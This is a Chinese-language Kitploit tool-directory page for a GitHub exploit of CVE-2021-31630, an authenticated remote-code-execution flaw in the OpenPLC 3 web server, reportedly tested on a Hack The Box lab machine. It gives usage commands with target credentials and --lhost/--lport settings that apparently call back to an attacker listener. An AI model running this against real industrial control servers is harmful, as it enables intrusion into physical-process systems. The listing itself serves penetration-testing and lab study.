Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-31630 — OpenPLC 3 Web服务器认证远程代码执行。 | Kitploit
工具/GitHubGitHub/manuelsantosiglesias/cve-2021-31630
漏洞分析漏洞利用SCADA/ICS安全Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubmanuelsantosiglesias/cve-2021-31630

CVE-2021-31630

OpenPLC 3 Web服务器认证远程代码执行。

查看仓库
62年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-31630

OpenPLC 3 Web服务器认证远程代码执行。

描述

Open PLC Web服务器 v3 中存在命令注入漏洞,使远程攻击者能够执行任意代码。仅在 HTB Wifinetictwo.htb 机器上测试过。

我发现所有利用该漏洞的脚本都有问题,可能是因为我使用的是 Parrot 或我的浏览器,Chromium 可以用来登录,我在 Firefox 上遇到了登录问题,并且 Web 服务器在处理登录的 POST 请求时出现了一些奇怪的现象。 我修改了 thewhiteh4t 的脚本,其中部分代码(主要是上传方法)是直接复制的,但我修改了从服务器获取 Cookie 以执行漏洞利用的部分。

原始 PoC 由 Fellipe Oliveira 提供。

希望在你遇到问题时能有所帮助。

依赖

root@kitploit:~
pip3 install requests

用法

root@kitploit:~
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx

或者,你可以修改 exploit.py 文件:

root@kitploit:~
...
# LHOST 和 LPORT 默认值
LHOST = '10.10.1.1'
LPORT = '4444'
...

python3 exploit.py http://10.129.x.x:8080 user pass
下载工具